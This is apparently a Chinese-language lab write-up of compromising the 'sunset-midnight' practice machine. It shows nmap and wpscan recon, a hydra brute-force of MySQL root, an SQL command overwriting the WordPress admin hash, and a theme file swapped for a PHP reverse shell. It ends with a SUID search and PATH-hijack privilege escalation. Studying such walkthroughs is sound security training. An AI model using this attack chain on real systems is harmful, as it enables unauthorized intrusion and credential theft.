主机发现

sudo nmap -sn 192.168.162.0/24

端口扫描

sudo nmap --min-rate 10000 -p- 192.168.162.147 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-09 11:24 CST
Nmap scan report for 192.168.162.147
Host is up (0.00046s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
MAC Address: 00:0C:29:2C:C9:48 (VMware)
sudo nmap -sT -sV -sC -O -p22,80,3306 192.168.162.147  
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-09 11:25 CST
Nmap scan report for 192.168.162.147
Host is up (0.00046s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 9c:fe:0b:8b:8d:15:e7:72:7e:3c:23:e5:86:55:51:2d (RSA)
| 256 fe:eb:ef:5d:40:e7:06:67:9b:63:67:f8:d9:7e:d3:e2 (ECDSA)
|_ 256 35:83:68:2c:33:8b:b4:6c:24:21:20:0d:52:ed:cd:16 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-title: Did not follow redirect to http://sunset-midnight/
|_http-server-header: Apache/2.4.38 (Debian)
3306/tcp open mysql MySQL 5.5.5-10.3.22-MariaDB-0+deb10u1
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.3.22-MariaDB-0+deb10u1
| Thread ID: 16
| Capabilities flags: 63486
| Some Capabilities: FoundRows, LongColumnFlag, InteractiveClient, SupportsLoadDataLocal, IgnoreSpaceBeforeParenthesis, SupportsTransactions, Speaks41ProtocolOld, IgnoreSigpipes, Speaks41ProtocolNew, Support41Auth, ODBCClient, SupportsCompression, ConnectWithDatabase, DontAllowDatabaseTableColumn, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
| Status: Autocommit
| Salt: q>#3vy{#6$SU12HSHN2M
|_ Auth Plugin Name: mysql_native_password
MAC Address: 00:0C:29:2C:C9:48 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
sudo nmap --script=vuln -p22,80,3306 192.168.162.147
[sudo] mikannse 的密码:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-09 11:25 CST
Nmap scan report for 192.168.162.147
Host is up (0.00038s latency).

PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-wordpress-users:
| Username found: admin
|_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-users.limit'
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /blog/: Blog
| /wp-login.php: Possible admin folder
| /wp-json: Possible admin folder
| /robots.txt: Robots file
| /readme.html: Wordpress version: 2
| /feed/: Wordpress version: 5.4.2
| /wp-includes/images/rss.png: Wordpress version 2.2 found.
| /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
| /wp-includes/images/blank.gif: Wordpress version 2.6 found.
| /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
| /wp-login.php: Wordpress login page.
| /wp-admin/upgrade.php: Wordpress login page.
| /readme.html: Interesting, a readme.
| /0/: Potentially interesting folder
| /contact/: Potentially interesting folder
|_ /home/: Potentially interesting folder
3306/tcp open mysql
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:2C:C9:48 (VMware)

Web

发现不能IP直接访问网页,而且重定向到一个sunset,也许需要添加host解析

虽然能访问了,但是加载得好慢

发现是一个wordpress站点

小扫一下目录,每个目录都尽可能地看一眼。登陆界面有提示账户是否存在,拿wpscan跑一下

wpscan --url http://sunset-midnight/ --enumerate vp,vt,tt,u

找到一个admin用户,爆破一下密码

发现爆破不出来,用的rockyou,试着爆破一下mysql吧,

hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.162.147 mysql -t 4

得到密码robert

远程连接数据库,发现有个wp的数据库,得到了admin的密码哈希但是无法破解。emmm,也许可以自己更改密码?密码设为123456,

UPDATE wp_users SET user_pass="e10adc3949ba59abbe56e057f20f883e" WHERE ID=1;

Getshell

成功登录,接下来就是老套路了,通过外观里的主题编辑来更改index.php为PHP反弹shell。但是更新的时候报错:Unable to communicate back with site to check for fatal errors, so the PHP change was reverted. You will need to upload your PHP file change by some other means, such as by using SFTP.

右上角把主题改为twentytwenty,然后就能更新了。

访问

http://sunset-midnight/wp-content/themes/twentytwenty/index.php

成功getshell,发现有一个jose用户。在wp_config找到jose的数据库密码:645dc5a8871d2a4269d4cbe23f6ae103,原本以为是md5加密要爆破才能登录,没想到直接就能登录

提权

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null

找到一个/usr/bin/status,放IDA看一下,发现没有绝对路径地调用了service,又是熟悉的环境变量劫持,上一个靶机刚打过就不多赘述了。

碎碎念

感觉都还是熟悉的元素,没啥好说的233